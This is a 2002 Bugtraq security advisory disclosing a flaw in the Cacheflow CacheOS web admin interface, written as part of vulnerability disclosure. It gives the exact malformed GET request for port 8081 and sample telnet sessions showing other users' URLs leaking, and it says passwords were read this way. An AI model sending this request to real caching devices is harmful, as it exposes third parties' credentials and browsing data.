From bugtraq@svindel.net Tue Jan 8 20:14:14 2002 From: Bjorn Djupvik To: bugtraq@securityfocus.com Cc: tommy@svindel.net Date: Tue, 8 Jan 2002 23:14:59 +0100 Subject: svindel.net security advisory - web admin vulnerability in CacheOS [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] ---------------------------------------------------------------------------- ------------------- SECURITY ADVISORY No: 001 (yay, our first!) Credits: svindel.net research team Date published: 01/08/2002 First discovered: 10/31/2001 Title: Cacheflow CacheOS[tm] web admin vulnerability ---------------------------------------------------------------------------- ------------------- Description: CacheOS is a piece of software used by web caching devices made by Cacheflow (www.cacheflow.com), basically an Intel based box with a RAID array and a custom OS. The CacheFlow has a web-admin interface open at port 8081 by default. By sending a certain request, malicious hosts can view parts of web pages and url's transferred through the cache at the time. Examples of data that may be gathered using this method are, usernames/passwords, form contents, url's etc.. This exploit was tested on various CacheOS v3.1.* boxes and all were vulnerable, we did not test on 4.* versions. Exploit: telnet or use nc to connect to port 8081, then issue the following command: GET /Secure/Local/console/cmhome.htm Now legally in http you should also supply something like HTTP/1.0 at the end of that string, if you do that then the cache replies that my station is not authorized to view page. If you omit HTTP/1.0 like I did above, most times the cache just issues this: ---------------------------------------------------------------------------- ------------------- Example exploit session: localhost:~# telnet cacheflow 8081 Trying xxx.xxx.xxx.xxx... Connected to cacheflow. Escape character is '^]'. GET /Secure/Local/console/cmhome.htm HTTP/1.0 200 OK Request cannot be honored Connection closed by foreign host ---------------------------------------------------------------------------- ------------------- But if you try multiple times it will sometimes return something like this: ---------------------------------------------------------------------------- ------------------- localhost:~# telnet cacheflow 8081 Trying xxx.xxx.xxx.xxx... Connected to cacheflow. Escape character is '^]'. GET /Secure/Local/console/cmhome.htm HTTP/1.0 404-Not Found 404 Not Found

404 Not Found

The request ed URL "/Secure/Local/console/cmhome.htm Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234 acbe &sid=3c234acbec234acbe&ord=1" was not found on this server.

Connection closed by foreign host. ---------------------------------------------------------------------------- ------------------- As you can see, the chunk of code it blurted out in the 404 page contained part of an url that a client on the cache was visiting at the time. We have also been able to read passwords from URL's using this technique. There are probably more ways to exploit this and greater holes to be found, but we didn't find any.. feel free to poke around :) Vendor status: support@cacheflow.com were contacted on 10/31/2001 and we got a quick reply asking us for more information, however no information of patches or fixes were supplied to us so we don't know if this is fixed in the latest versions of CacheOS or not. Since such a long time has passed, we are now releasing this advisory. ---------------------------------------------------------------------------- ------------------- [c] 2002 svindelegget